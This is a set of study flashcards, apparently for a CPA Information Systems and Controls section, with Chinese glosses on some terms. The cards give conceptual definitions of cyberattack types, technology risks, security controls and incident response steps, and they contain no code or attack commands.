ISC S3

Question 1

Cyberattacks 网络攻击

Answer 1

-malicious activity 恶意的
-targets computer information system, infrastructures, computer network or personal computer devices
-attempts to collect, disrupt, deny, degrade or destroy information system
-directly or indirectly affect the organizations, its customers, vendors and etc.

Question 2

Threat agent

Answer 2

-internal or external attacker that could negatively impact data security
-through thef, manipulation
操纵 or control of sensitive information or system

Question 3

Type of thereat agent: attack, adversary

Answer 3

-attack, threat actor or hacker
-adversary: actors with interest in conflict with the organization , perform malicious actions against organization’s cyber resources such as intercepting 拦截 purchases, theft of data, tampering with 篡改 hardware prior to installation

Question 4

Type of threat agent: Government-sponsored/Nation-State Sponsored Actors:

Answer 4

They’ve been known to steal and exfiltrate intellectual property, sensitive information, and even funds to further their nation’s espionage causes.间谍活动原因

Question 5

Type of threat agent: Hacktivist

Answer 5

-Groups of hackers that operate:
To promote certain social causes or political agendas
-On a self-proclaimed 自称 relatively moral basis by staying away from certain targets like:
Hospitals, Churches, and other organizations that have altruistic purposes or missions.

Question 6

Type of threat agent: insider

Answer 6

-Employees that either organically developed into a person with malicious intentions
-Employees that intentionally infiltrated 渗透 an organization to achieve nefarious 邪恶 objectives.

Question 7

Type of external threat

Answer 7

-Threats that occur from outside of the organization, entity, or individual that is the target of the cyberattack.

Question 8

Type of cyber attacks:

Answer 8

-Network-based attack
-application based attack
-host-based attack
-social engineering attack
-physical ( on-premises) attacks
-supply chain attacks

Question 9

Type of cyber attack: network-based attack

Answer 9

-backdoors and trapdoors
-methods to bypass security access procedures by creating an entry and exist point to a network that is undocumented . Not attack on a network but they facilitate entry into the network that can be used to execute attack

-backdoors may be intentionally installed or unintentionally left available due to product defects
-Trapdoors are often installed by system owners to bypass security measures to gain access.

Question 10

Network based attack : covert channel

Answer 10

-Violate the entity’s security policy but do NOT exceed the entity’s access authorization.
So they can communicate data in small parts.

-storage channels : data is transmitted by modifying a storage location, allowing another party with lower security permission to access the data

-timing channels: use the delay ( or gaps) in transmitting data packets to hide the transmission

Question 11

Network based attack: Buffer overflows

Answer 11

-attacker overload a program’s buffer (the temporary storage) with more input than it is designed to hold
-may cause the program to overwrite or crash
-the attacker can inject malicious code or take control of a system

Question 12

Network based attack: denial of service ( DoS)

Answer 12

-an attacker floods a system’s network by congesting it with large volumes of traffic that are greater than the bandwidth it was designed to handle

Question 13

Network based attack : distributed denial of service (DDoS) attacks

Answer 13

-when multiple attackers or compromised devices are working in unison 一致to flood an organization’s network with traffic
-more powerful than a traditional DoS attack

Question 14

Network based attack: man in the middle ( MITM) attack

Answer 14

-(Eavesdropping)窃听
-The attacker acts as an intermediary between two parties intercepting 拦截 communications, acting as a legitimate entity within a typical secure session

Question 15

Network based attack: port scanning attacks

Answer 15

-scanning network for open orts is frequently done by attackers to find vulnerabilities that can be exploited so that they can gain unauthorized access to a company’s network

-Common vulnerabilities include:
Un-secured protocols and or Unpatched protocols
Poor login credentials, and poorly configured firewalls.

Question 16

Network based attack: ransomware attacks

Answer 16

Typically come in the form of malware that locks a user or a company’s operating systems, applications, and the ability to access data unless a ransom is paid.

Question 17

Network based attack: reverse shell attacks

Answer 17

-Also referred to as ‘‘connect-back shells’’

-A victim initiates communication with an attacker from behind a company’s firewall so that the attacker can bypass the firewall and any other network safeguards and remotely control the victim’s machine.

Question 18

Network based attack: replay attack

Answer 18

-A type of MITM attack in which a cybercriminal eavesdrops窃听 on a secure network communication, intercepts it, and then ‘‘replays’’ the message at a later time to the intended target to gain access to the network and the data that is behind the firewall.

Question 19

Network based attack: return-oriented attack

Answer 19

-

Question 20

Network based attack: spoofing

Answer 20

-The act of impersonating 模仿 someone or something to obtain unauthorized system access by using falsified credentials 伪造的 or imitating 模仿 a legitimate person or entity by using fake IP addresses, domains, or email addresses.

Question 21

Network based attack: spoofing 欺骗

Answer 21

-Address resolution spoofing : all devices on a network have MAC addresses that maps to an IP address. Manipulating the mapping of the ARS means fraudsters can channel messages to alternate destinations.

-DNS spoofing : A company’s DNS server translates domain names to IP addresses. If this mapping is tweaked by an attacker to redirect someone to another IP address that leads to a mimicked website, the victim could potentially enter usernames and passwords, sensitive information, or download a malicious application from the fake site.

-Hyperlink Spoofing

Question 22

application-based attack

Answer 22

-target specific software or applications (desktop or web) such as databases or websites to gain

Question 23

application-based attack-SQL

Answer 23

-inject malicious SQL code into existing SQL code on a company’s website to gain unauthorized access to a company’s data

Question 24

application-based attack-Cross-site scripting ( XSS)

Answer 24

-similar to SQL injection, but attack inject code to a company’s website that attacks users visiting the company’s website

Question 25

application-based attack-race condition

Answer 25

An attacker exploits a system or application that relies on a specific sequence of operations. By forcing the application to perform two or more operations out of order or simultaneously An attacker may gain unauthorized access or execute a fraudulent act.

Question 26

application-based attack: mobile code

Answer 26

-malicious mobile code is virus -overwrite virus -multi-partite virus -parasitic virus

Question 27

Host-base attacks

Answer 27

-target a single host like laptop, mobile device, or a server to disrupt functionality/ obtain unauthorized access

Question 28

Host-based attacks: Brute force attacks

Answer 28

-attacker use an automated program that attempts to guess a password

Question 29

Host-based attack: Keystroke logging

Answer 29

-tracking the sequence of keys by a user on keyboard, collect confidential data such as usernames, password, and personal information

Question 30

Host-based attack Malware

Answer 30

- example: viruses, worms, Trojan horses, adware, spyware, and other code-based programs that infect a host.

Question 31

Host-based attack: rogue mobile apps

Answer 31

Involve the use of a malicious app that appears legitimate. A fraudulent party creates a mobile application that is installed by a victim unsuspectingly The app then steals information, gives the attacker unauthorized access, or executes some other malicious act.

Question 32

Social engineering attack

Answer 32

-Involve the use of psychological manipulation 心理操纵 or deception 欺骗 to get employees to: Divulge sensitive information 泄露敏感信息, Provide unauthorized access, or assist an attacker in committing fraud.

Question 33

Social engineering attacks: phishing 网络钓鱼

Answer 33

Uses authentic-looking, but fake, emails that request information from users or direct them to a fake website that requests information

Question 34

Social engineering attack: spear phishing

Answer 34

This form of phishing targets employees in a corporate entity by posing as a legitimate department or employee, such as human resources or the IT director. The goal is to obtain confidential information such as usernames, passwords, or personal data that can be used for exploitation.

Question 35

Social engineering attack: Business email compromise

Answer 35

-This is a form of phishing that targets executives and other high-ranking individuals. -Typically involves schemes to get the executive to: -Transfer money through a wire -Pay fake foreign suppliers -Send sensitive data to someone impersonating an attorney or other employee. -Also called whaling.

Question 36

Social engineering attack: Pretexting

Answer 36

-This attack is similar to BEC and spear phishing, but it involves creating a fake identity or scenario so that the employee has a sense of urgency to act

Question 37

Social engineering attack: Catfishing

Answer 37

Involves the creation of a fake online persona that is used to lure a victim into a personal relationship with a fraudster.

Question 38

social engineering attack: pharming

Answer 38

-The link to the fraudulent site may be in a phishing email. The scheme may even involve the manipulation of Domain Name System (DNS) servers so that the website's URL replicates the correct address.

Question 39

social engineering attack: Vishing

Answer 39

-involves fraudulent schemes using the telephone system voice over internet protocol ( VolP) -normally involve a fraudulent caller ID that is tied to legitimate business or person

Question 40

Physical ( on-premises) attack

Answer 40

-by obtaining access to outdated or discarded equipment in the trash or through companies that accept discarded equipment

Question 41

Physical attack: piggybacking

Answer 41

Involves an attacker using an authorized person's access to gain entrance to a physical location or electronic access.

Question 42

Physical attack: targeted by attackers

Answer 42

On-premises infrastructures are often targets of hacking groups or attackers because they know that many organizations lack sophisticated cybersecurity defenses.

Question 43

physical attack: tampering

Answer 43

Involves gaining physical access to a company's IT infrastructure and modifying the way its network collects, stores, processes, or transmits data. Can be done by physically rewiring cabling, plugging in directly to network equipment, or adding an unauthorized device to the existing network.

Question 44

Supply chain attack : embedded software code

Answer 44

-Involves inserting code into prepackaged software or firmware being sold to a company that later installs the software after purchase

Question 45

Supply chain attack: foreign-sourced attacks

Answer 45

Governments have deep/widespread control of companies in the private sector. Those governments may use products sold to other countries to conduct surveillance or deliver malicious code.

Question 46

supply chain attack: pre-installed malware on hardware

Answer 46

Involves installing malware on devices that will be used by companies in a supply chain, such as USB drives, cameras, or phones. Once the company acquiring the devices connects them to the company's network, the malware executes.

Question 47

supply chain attack : vendor attack

Answer 47

Perpetrated upon key vendors of a target company so that the normal production of goods or business operations is disrupted.

Question 48

Supply chain attack: watering hole attacks

Answer 48

Fraudsters identify websites of suppliers, customers, or regulatory entities that are known to be used by several companies or even entire industries. The attackers then look for weaknesses at that third party that can be used to deliver malware, steal data, or obtain unauthorized access.

Question 49

risk related to cloud computing

Answer 49

1. additional industry exposure 2. cloud malware injection attack 3. compliance violations : there is the compliance risk that these hosts or service providers do not have the security protocols and procedures in place to meet regulations on privacy and confidentiality 4. loss of data 5.loss of control 6. loss of visibility 7.multi-cloud and hybrid management issues 8. theft or loss of intellectual property: risk that service provider lacks sufficient controls over the data which results in theft or loss intellectual property

Question 50

Risk related to mobile technology

Answer 50

1. application malware: occurs when a user download an application that appears to be legitimate 2. lack of updates 3.Lake of Encryption 4.physical threats 5.unsecured wi-fi network 6.location tracking 7.mobile storage device

Question 51

risk related to internet of things (IoT)

Answer 51

-internet of things is class of smart device connected to internet that provide automation and remote control for other devices in a home or office 1. device mismanagement: insufficient password control 2. device spoof: attacker creates illegal or face device and introduces it to a company's network, posing as an actual device to gain information or access to that network 3. Escalated cyberattacks 升级的, IoT can be used as attack base to infect more machines 4.expanded footprint : increasing the number of points subjected to attack 5. information theft 6.outdated firmware 固件 7.Malware 恶意软件 8.Network attacks: overburden a network with traffic

Question 52

three control objective of COSO internal control framework

Answer 52

-operational objective -reporting objective -compliance objective

Question 53

five component of COSO internal control framework

Answer 53

-control environment -risk assessment -information and communication -monitoring activities -control activities

Question 54

Security policies, standards, and procedures

Answer 54

-security policies: uppermost level, overview of an organization's security needs and strategic plan -standards: middle , uses as a benchmark to accomplish the goals defined by the security policies -procedure: bottom, standard operating procedure (SOP), typically detailed document

Question 55

Type of security policies

Answer 55

-Acceptable use policy (AUP): protect technology resource, ask to sign prior to being granted to the system. -mobile device security policies: usually stipulate password protection rules, multifactor authentication requirements, any required encryption, web browsing rules, parameters for connecting to public networks, and policies regarding other applications or file downloads on the devices -bring your own devices ( BYOD) policies: allow to use personally owned devices for work related activities and connect to company's network : a. monitor and enforcement of action on personal devices ( prevent intrusion from malicious actor, but also set standard for respecting employee privacy) b. company own the data of the device not the employee c. policy define who is responsible for compensating someone for losses in the event the employee or company is assigned blame d. restricted activities and application downloads on personal devices

Question 56

Network security method

Answer 56

-network segmentation or isolation (inaccessible or separated from outside communications) -firewall -service set identifier : the name of network, disable SSID could help for improve wireless network security -VPN: a virtual network built on top of existing physical network that provides a means of secure communications using encryption protocols (ie: tunneling and internet protocol security (IPsec)) -Wi-FI protection access (WPA) : security protocol designed to protect wireless networks (Wi-Fi) by encrypting the data sent over them. -endpoint security: such as Antivirus and malware screening software , auditing software -System hardening -Media access control ( MAC) filtering: is a form of filtering in which an access point blocks access to unauthorized devices using a list of approved MAC addresses.

Question 57

Zero trust

Answer 57

-assume the company's network is always at risk -continuous validation at every point of user's interaction with network

Question 58

Least privilege

Answer 58

-users and systems are granted the minimum authorization and system resources -System permissions are granted with the new role, but access from the prior role is never removed. This violates the concept of least privilege. -difference with need to know: focus on access needed to perform the job

Question 59

whitelisting/ allow listing

Answer 59

-Whitelisting is the process of identifying a list of applications that are Authorized to run on an organization's systems and only allowing those programs to execute -Similarly, Blacklisting/Deny listing is identifying a list of applications NOT Authorized on a network and preventing those from running.

Question 59

Need to know ( data only )

Answer 59

-focuses on the data itself that is needed to perform the job

Question 60

Preventive control

Answer 60

-safeguarding practices -education and training -regular security updates -Encryption -Firewalls -patches: an update or modification to an existing software program -physical barriers -device and software hardening : Minimizing the number of vulnerabilities across hardware devices and software applications prevents some attacks from occurring. Such as employee did not have right to download software in his device -intrusion prevention system ( IPS): similar to firewall

Question 61

Preventive control: access control -authorization model

Answer 61

-discretionary access control ( DAC): decentralized allow data owners, custodians or creators to manage their own access. Mandatory access control ( non-discretionary) : centrally manage, access is not based on identify but on general set of rules that governs the entire system -Role-based access control: access based on user's job role -rule base access control: manage access according to predetermined set of rules - policy base access control (PBAC): more flexible than rule based because it allows for the analysis of theoretical privileges based on actual privileges -risk based access control : if high risk use stricter security measures such as multifactor authentication,

Question 62

Access control list ( ACL)

Answer 62

-outlines which users have permission to access certain resources -filesystem ACL -network ACL: not only used for controlling access but also for improve network performance by restricting or channeling the flow of data

Question 63

Access control list ( ACL) vs firewall

Answer 63

-both filter traffic on network -ACLs are generally used to manage user access and permissions. -Firewalls are intended to protect an organization from malicious attacks.

Question 64

Stateful ACL

Answer 64

-ACLs do not have the ability to recognize where a data packet 数据包 originated or other details about the connection. -stateful" ACLs, meaning the ACL monitors the state of network traffic 网络流量状态 to evaluate details such as source and destination addresses. - is a type of firewall filtering mechanism that not only filters traffic based on predefined rules (like traditional ACLs) but also tracks the state of active connections

Question 65

detective control

Answer 65

-detect a threat while it is occurring and provide assistance during investigations and audits after the events has occurred

Question 66

Type of detective control

Answer 66

-Network intrusion detection system ( NIDS): monitor incoming traffic on all devices on a network by Matching specific elements of that traffic to a library of known attacks Sending system alerts when events meeting predefined criteria are detected. -antivirus software monitoring: Antivirus software works by scanning files in real time & comparing them to a library of known viruses. -Network monitoring tools: such as packet sniffer, network performance monitoring( NPM), simple network management protocol (SNMP) -log analysis -Intrusion detection system ( IDS)

Question 67

Corrective control

Answer 67

-fix known vulnerabilities -Reconfigurations:重新配置 : revamping firewall rules, retooling an operating system's settings, and altering access control settings. -upgraded and patches -revised policies and procedures -updated employee training -virus quarantining :Isolating actual or suspected viruses removes the threat from the rest of a company's network. Usually accomplished in an automated manner via antivirus software or manually after suspicious activity has been flagged from the review of system logs. -Recovery and continuity plan -antivirus software removal of malicious viruses

Question 68

confidential vs privacy

Answer 68

-privacy protect the rights of an individua and give the individual control over what information they are willing to share with others -confidentiality: protect unauthorized access to information gathered by the company

Question 68

obfuscation 混淆

Answer 68

-the process of replacing sensitive information with data that is less valuable to unauthorized user -Tokenization : give a example, does not change the length/ type of characters -masking : using ** or other symbol to replace real information. -encryption

Question 69

Data loss prevention ( DLP)

Answer 69

-network-based DLP: scan outgoing data that meet specific criteria. such as email, file transfer protocols, and direct messaging -cloud-based DLP -endpoint-based DLP : such as a printer, USD driver or any other device to which data can be transferred

Question 70

method of protect data

Answer 70

-physical security -digital security control: encrypted hard drives, usd drivers, source file -authorization and user access control : such as role-based access controls, rule-based access controls, discretionary access controls, and multifactor authentication -change management control: -backup and recovery mechanisms

Question 71

delete confidential information

Answer 71

-purged vs delete purge is data removed from the system but can be accessed through archives, delete means all reference to data is permanently removed

Question 72

method of delete confidential information

Answer 72

-physical destruction -erasing ( or deleting) : permeant delete operation of a file -overwriting/clearing : preparing media for reuse by replacing the old data with unclassified data -

Question 73

three response team model

Answer 73

-centralized incident response team : single incident response team is tasked with managing incidents across the organization ( effective for small organization) -distributed incident response team : multiple incident response team , effective for orgs that have computing resources widespread geographically -coordinating team: A secondary function of either a distributed or centralized incident response team is coordinating with other departments without having authority over those teams.

Question 74

consider factor when selecting structure and staffing model for incident response team

Answer 74

-24/7 availability -full time vs part time team members -employee morale -cost -staff expertise

Question 75

Event vs incident

Answer 75

-incident: An incident is a security event (or a series of events) that actually compromises or threatens to compromise the confidentiality, integrity, or availability (CIA) of information or systems. Something bad happened that requires a response -event: An event is any observable occurrence in a system or network. It can be normal or abnormal, and it's not necessarily harmful.

Question 76

steps in responding to an incident

Answer 76

1.preparation : tools and method adopted in preparation include: vulnerability assessment software, intrusion detection and prevention application ( vulnerability scanners), anti-malware software, training for both end users and specialist 2. detection: recognizing deviation from normal operations, evaluating those deviation, classifying them as either an acceptable event or problematic cybersecurity incident 3. containment: contain the incident from spreading : determine the best approach to eliminate the threat, isolating a segment of a network, removing infected servers from production, inform employee routine operations might stop 4. eradication 根除: remove the threat and restoration of affected system 5.reportin 6.recover: early days focus on overall security and implementing immediate high impact changes. Followed by long term phrases involve strategic changes such as a shift in infrastructure to prevent similar cybersecurity incidents from reoccurring 7. post-incident activity/ lessons learned

Question 77

Indications an organization did not respond appropriately

Answer 77

-increase in frequency if incidents or severity if incidents -time to identify or contain incidents -increases in data center downtime or IT infrastructure damage -cost of fine, attorneys, and consultants -decline in company reputation

Question 78

method of detection listed in the content of an IRP

Answer 78

-vulnerability scanning software -anomaly异常 detection -endpoint detection and response (EDR) solutions -file integrity monitoring -log analysis -intrusion detection system ( IDS) -INTRUSION PREVENTION SYSTEM ( IPS) -physical security monitoring -security information and event management solutions (SIEM) -threat intelligence software -user behavior analytics (UBA) tools

Question 79

adverse event vs computer security incident

Answer 79

-adverse event: any event with negative consequence , both intentional and unintentional events, human-inflicted and environmentally-inflicted events ie: system crashes, packet floods, unauthorized use of system privileges -computer system incident: computer security related, caused by malicious human intent ie: an attacker flooding a web server with requests resulting in a site crash